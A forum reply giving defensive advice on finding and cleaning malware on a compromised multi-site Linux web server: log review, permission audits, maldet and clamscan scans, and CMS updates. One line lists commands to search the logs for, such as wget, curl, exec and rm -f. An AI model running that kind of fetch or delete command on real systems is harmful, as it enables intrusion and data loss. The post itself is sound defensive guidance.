Quote:
Originally Posted by Patric.F
I'm very interested in this as I don't want to find my new server infected again and start all over.
|
First and foremost:
https://www.linuxquestions.org/quest...erences-45261/
Not that I'm typical, or even good at this, but I usually start with the logs in /var/log/* and I look for what stands out.
"sites user" seems like a good starting point.
I usually check for incorrect file permissions.
Anything not File=644 and Directory=755 is immediately suspect, unless it's expected, such as .cgi stuff.
and then compare those files from suspicious stuff in /var/log/*
I do not allow the customer to dictate what permissions they "need".
If you allow "users" to ftp in and edit /var/www/some/path, then ftp credentials are immediately suspect.
I check the logs for files being dropped in /tmp or /var/tmp
I check the logs for wget, curl, lwp-<something>, exec, rm -f, unzip, tar...
Code:
maldet -d; maldet -u
using maldet 1.5
clamscan will tell you what's in files that it says are infected.
clamscan does not clean anything, it can move or delete infections, if told to do so, and easily identifies infections.
With 30 some sites, I'd
Code:
clamscan -ir /var/www/ > /root/scan.rpt
which will scan recursively and report only infected files.
Examine /root/scan.rpt closely and compare to hits in examining /var/log/*
Wordpress or other popular target platforms? e107, Joomla! up-to-date?
Not up-to-date Plugins are ruthlessly targeted.
What Content "system" are these sites using? What is the common-denominator?
All of them up-to-date?
apache should run as httpd/www-data
That's a basic start. Other more experienced board members, and security pros will offer other techniques I may have missed
without my daily caffeine.